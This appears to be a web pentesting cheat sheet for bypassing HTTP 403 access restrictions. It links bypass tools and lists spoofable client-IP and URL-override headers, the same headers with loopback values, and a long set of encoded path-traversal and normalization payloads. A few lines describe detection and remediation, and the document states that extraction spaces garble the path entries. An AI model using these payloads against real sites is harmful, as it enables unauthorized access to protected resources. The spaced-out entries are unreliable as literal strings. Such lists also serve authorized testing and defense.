https://github.com/iamj0ker/bypass-403
https://github.com/channyein1337/403-bypass/blob/main/403-bypass.py
https://github.com/nico989/B1pass3r
https://github.com/Dheerajmadhukar/4-ZERO-3
bypass by fuzzing or brute force
you can use the dirsearch tool or another content-discovery tool to enumerate paths
search the Wayback Machine for this subdomain; you may find important paths there
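bypass by header names
These are request headers that a misconfigured reverse proxy or application may trust for the client IP, host, or requested URL. A front end that strips or overwrites them before forwarding, and a backend that reads the client address only from the connection or a trusted proxy, is not affected.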
Base-Url
Client-IP
Http-Url
Proxy-Host
Proxy-Url
Real-Ip
Redirect
Referer
Referrer
Refferer
Request-Uri
Uri
Url
X-Client-IP
X-Custom-IP-Authorization
X-Forward-For
X-Forwarded-By
X-Forwarded-For-Original
X-Forwarded-For
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Scheme
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded
X-Forwarder-For
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Original-Remote-Addr
X-Original-Url
X-Originating-IP
X-Proxy-Url
X-Real-Ip
X-Remote-Addr
X-Remote-IP
X-Rewrite-Url
X-True-IP
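bypass by header payloads (each header name above with a value)
The loopback value matters only where an access rule allows 127.0.0.1 based on one of these headers instead of the real socket address; logging requests that carry these headers with a loopback value is a practical detection signal.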
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
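bypass by path payloads
The strings below are path and URL variations. They depend on the access-control layer and the backend parsing or normalizing the same path differently, so the usual remedy is to decode and normalize the path once and run the authorization check on that same normalized form. (The extra spaces inside the entries are an extraction artifact of this listing.)
#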
#?
% 09
% 09 % 3 b
% 09. .
% 09 ;
% 20
% 23
% 23 % 3 f
% 252 f % 252 f
% 252 f /
% 2 e % 2 e
% 2 e % 2 e /
% 2 f
% 2 f % 20 % 23
% 2 f % 23
% 2 f % 2 f
% 2 f % 3 b % 2 f
% 2 f % 3 b % 2 f % 2 f
% 2 f % 3 f
% 2 f % 3 f /
% 2 f /
% 2 f ;?
% 2 f ?;
% 3 b
% 3 b % 09
% 3 b % 2 f % 2 e % 2 e
% 3 b % 2 f % 2 e % 2 e % 2 f % 2 e % 2 e % 2 f % 2 f
% 3 b % 2 f % 2 e .
% 3 b % 2 f ..
% 3 b / % 2 e % 2 e / ..% 2 f % 2 f
% 3 b / % 2 e .
% 3 b / % 2 f % 2 f ../
% 3 b / ..
% 3 b // % 2 f ../
% 3 f % 23
% 3 f % 3 f
% 3 f .php
..
..% 00 /
..% 00 / ;
..% 00 ;/
..% 09
..% 0 d /
..% 0 d / ;
..% 0 d ;/
..% 5 c /
..% ff /
..% ff / ;
..% ff ;/
../
..;% 00 /
..;% 0 d /
..;% ff /
..;\\
..;\\;
..\\
..\\;
.html
.json
/
/ #
/ % 20
/ % 20 #
/ % 20 % 23
/ % 23
/ % 252 e % 252 e % 252 f /
/ % 252 e % 252 e % 253 b /
/ % 252 e % 252 f /
/ % 252 e % 253 b /
/ % 252 e /
/ % 252 f
/ % 2 e % 2 e
/ % 2 e % 2 e % 2 f /
/ % 2 e % 2 e % 3 b /
/ % 2 e % 2 e /
/ % 2 e % 2 f /
/ % 2 e % 3 b /
/ % 2 e % 3 b //
/ % 2 e /
/ % 2 e //
/ % 2 f
/ % 3 b /
/ ..
/ ..% 2 f
/ ..% 2 f ..% 2 f
/ ..% 2 f ..% 2 f ..% 2 f
/ ../
/ ../ ../
/ ../ ../ ../
/ ../ ../ ..//
/ ../ ..//
/ ../ ..// ../
/ ../ ..;/
/ ../ ./ ../
/ ../ .;/ ../
/ ..//
/ ..// ../
/ ..// ../ ../
/ ..// ..;/
/ ../ ;/
/ ../ ;/ ../
/ ..;% 2 f
/ ..;% 2 f ..;% 2 f
/ ..;% 2 f ..;% 2 f ..;% 2 f
/ ..;/
/ ..;/ ../
/ ..;/ ..;/
/ ..;//
/ ..;// ../
/ ..;// ..;/
/ ..;/ ;/
/ ..;/ ;/ ..;/
/ ./
/ .//
/ .;/
/ .;//
//
// ..
// ../ ../
// ..;
// ./
// .;/
// / ..
// / ../
// / ..//
// / ..;
// / ..;/
// / ..;//
// ;/
/ ;/
/ ;//
/ ;?
/ ;x
/ ;x /
/ ?
/ ?;
/ x / ../
/ x / ..//
/ x / ../ ;/
/ x / ..;/
/ x / ..;//
/ x / ..;/ ;/
/ x // ../
/ x // ..;/
/ x / ;/ ../
/ x / ;/ ..;/
;
;% 09
;% 09. .
;% 09. .;
;% 09 ;
;% 2 F ..
;% 2 f % 2 e % 2 e
;% 2 f % 2 e % 2 e % 2 f % 2 e % 2 e % 2 f % 2 f
;% 2 f % 2 f / ../
;% 2 f ..
;% 2 f ..% 2 f % 2 e % 2 e % 2 f % 2 f
;% 2 f ..% 2 f ..% 2 f % 2 f
;% 2 f ..% 2 f /
;% 2 f ..% 2 f / ..% 2 f
;% 2 f ..% 2 f / ../
;% 2 f ../ % 2 f ..% 2 f
;% 2 f ../ % 2 f ../
;% 2 f ..// ..% 2 f
;% 2 f ..// ../
;% 2 f ..// /
;% 2 f ..// / ;
;% 2 f ..// ;/
;% 2 f ..// ;/ ;
;% 2 f ../ ;//
;% 2 f ../ ;/ ;/
;% 2 f ../ ;/ ;/ ;
;% 2 f ..;// /
;% 2 f ..;// ;/
;% 2 f ..;/ ;//
;% 2 f / % 2 f ../
;% 2 f // ..% 2 f
;% 2 f // ../
;% 2 f // ..;/
;% 2 f / ;/ ../
;% 2 f / ;/ ..;/
;% 2 f ;// ../
;% 2 f ;/ ;/ ..;/
;/ % 2 e % 2 e
;/ % 2 e % 2 e % 2 f % 2 f
;/ % 2 e % 2 e % 2 f /
;/ % 2 e % 2 e /
;/ % 2 e .
;/ % 2 f % 2 f ../
;/ % 2 f / ..% 2 f
;/ % 2 f / ../
;/ .% 2 e
;/ .% 2 e / % 2 e % 2 e / % 2 f
;/ ..
;/ ..% 2 f
;/ ..% 2 f % 2 f ../
;/ ..% 2 f ..% 2 f
;/ ..% 2 f /
;/ ..% 2 f //
;/ ../
;/ ../ % 2 f /
;/ ../ ../
;/ ../ ..//
;/ ../ ./ ../
;/ ../ .;/ ../
;/ ..//
;/ ..// % 2 e % 2 e /
;/ ..// % 2 f
;/ ..// ../
;/ ..// /
;/ ../ ;/
;/ ../ ;/ ../
;/ ..;
;/ .;.
;// % 2 f ../
;// ..
;// ../ ../
;// / ..
;// / ../
;// / ..//
;?
;x
;x /
;x ;
?
?#
?.php
?;
??
// /
/ % 2 f /
// % 2 f
% 2 f / % 2 f
% 2 f % 2 f % 2 f
% 2 f //